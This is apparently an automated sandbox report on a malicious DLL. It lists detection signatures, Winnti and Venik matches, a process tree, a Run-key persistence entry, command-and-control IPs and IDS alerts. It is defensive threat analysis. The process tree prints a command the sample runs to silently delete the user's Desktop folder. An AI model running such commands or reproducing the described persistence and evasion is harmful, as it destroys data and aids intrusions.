
Windows Analysis Report
2JSGOlbNym.dll

Overview

General Information

Sample name: 2JSGOlbNym.dll
renamed because original name is a hash value
Original sample name: bc3a8653c59edabf91eb545f7d9dcf818f3ef003.dll
Analysis ID: 1578341
MD5: e3f13188806c9a2ecabf5eab0cf7dc5f
SHA1: bc3a8653c59edabf91eb545f7d9dcf818f3ef003
SHA256: ad2003c10fcffe449f3b5bd445dca19d789eac82d64f0b764104d7b6d0fb955f
Tags: dll, user-NDA0E

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to communicate with device drivers
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1612 cmdline: loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2864 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2168 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 2372 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 3124 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 1232 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4356 cmdline: rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 3648 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 3596 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5572 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 3800 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3732 cmdline: rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5800 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 4900 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6044 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 4592 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 5536 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 416 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
2JSGOlbNym.dll | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth
  • 0x22b15:$x1: cracked by ximo
  • 0x25aec:$x1: cracked by ximo
Source | Rule | Description | Author | Strings
19.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo
11.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo
4.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth
  • 0x3aa8c:$x1: cracked by ximo
  • 0x3ab44:$x1: cracked by ximo
  • 0x3abfc:$x1: cracked by ximo
  • 0x3acb4:$x1: cracked by ximo
  • 0x3ad6c:$x1: cracked by ximo
  • 0x3ae24:$x1: cracked by ximo
  • 0x3aedc:$x1: cracked by ximo
  • 0x3af94:$x1: cracked by ximo
  • 0x5ed5e:$x1: cracked by ximo
  • 0x61d35:$x1: cracked by ximo

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1232, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COAPI


AV Detection

Source: 2JSGOlbNym.dll | Avira: detected
Source: 2JSGOlbNym.dll | ReversingLabs: Detection: 89%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2JSGOlbNym.dll | Joe Sandbox ML: detected
Source: 2JSGOlbNym.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49824 version: TLS 1.2
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2351563967.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*V source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*k source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 00000004.00000003.2298221763.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\*.*.*I source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: rundll32.exe, 00000004.00000003.2272862369.000000000342C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2474003270.0000000003488000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2353062409.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*e source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*T7 source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2272781039.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49718 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49745 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812407 - Severity 1 - ETPRO MALWARE Win32/Venik HTTP CnC Beacon : 192.168.2.11:49705 -> 107.163.56.231:18530
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49791 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49833 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49858 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49811 -> 107.163.56.251:6658
Source: Network traffic | Suricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.11:49769 -> 107.163.56.251:6658
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.56.232 18963
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.56.231 18530
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.56.110 18530
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.56.251 6658
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 116.133.8.92 443
Source: global traffic | TCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global traffic | TCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global traffic | TCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficTCP traffic: 192.168.2.11:49705 -> 107.163.56.231:18530
Source: global trafficTCP traffic: 192.168.2.11:49706 -> 107.163.56.110:18530
Source: global trafficTCP traffic: 192.168.2.11:49718 -> 107.163.56.251:6658
Source: global trafficTCP traffic: 192.168.2.11:49722 -> 107.163.56.232:18963
Source: Joe Sandbox ViewIP Address: 107.163.56.110 107.163.56.110
Source: Joe Sandbox ViewIP Address: 107.163.56.251 107.163.56.251
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49726 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49729 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49706 -> 107.163.56.110:18530
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49736 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49738 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49742 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49755 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49728 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49740 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49763 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49723 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49741 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49752 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49759 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49746 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49760 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49780 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49772 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49747 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49764 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49751 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49754 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49776 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49771 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49777 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49758 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49722 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49765 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49773 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49779 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49762 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49810 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49815 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49705 -> 107.163.56.231:18530
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49796 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49766 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49832 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49804 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49784 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49823 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49845 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49795 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49788 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49847 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49794 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49825 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49859 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49840 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49801 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49809 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49814 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49852 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49849 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49803 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49748 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49822 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49797 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49783 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49734 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49730 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49819 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49844 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49767 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49813 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49775 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49860 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49856 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49841 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49737 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49750 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49855 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49793 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49805 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49848 -> 116.133.8.92:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49799 -> 107.163.56.232:18963
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49820 -> 116.133.8.92:80
